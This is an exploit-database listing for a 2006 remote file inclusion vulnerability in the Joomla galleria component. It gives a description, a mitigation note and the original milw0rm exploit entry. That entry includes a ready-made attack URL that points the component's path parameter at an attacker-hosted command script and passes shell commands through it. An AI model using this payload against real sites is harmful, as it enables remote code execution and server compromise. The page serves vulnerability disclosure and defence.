header-logo
Suggest Exploit
vendor:
Galleria Component
by:
sikunYuk
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Galleria Component
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

galleria <= 1.0 Remote File InclusionVulnerability

A Remote File Inclusion vulnerability exists in the galleria component of Joomla! 1.0. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by sending a specially crafted HTTP request containing a malicious URL. The malicious URL contains the path to the vulnerable file and the malicious PHP code to be executed.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of the galleria component. Additionally, the application should be configured to only accept requests from trusted sources.
Source

Exploit-DB raw data:

Title       : galleria <= 1.0 Remote File InclusionVulnerability
-
URL         : http://binarydigit.at/
-
Author      : sikunYuk
-
Mail        : ineal[at]gmail.com
-
exploit     : http://[target]/[path]/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://[f*ckscript]/cmd.txt?&cmd=
-
greatz      : agoes,skulmatic,Olibekas,Vitux,weleh,arioo Powered by #pisslovcrew,#papmahackerlink,#tigapanah,#yogyahacker
-

# milw0rm.com [2006-07-04]

Navigation

Suggest Exploit

Services By CQR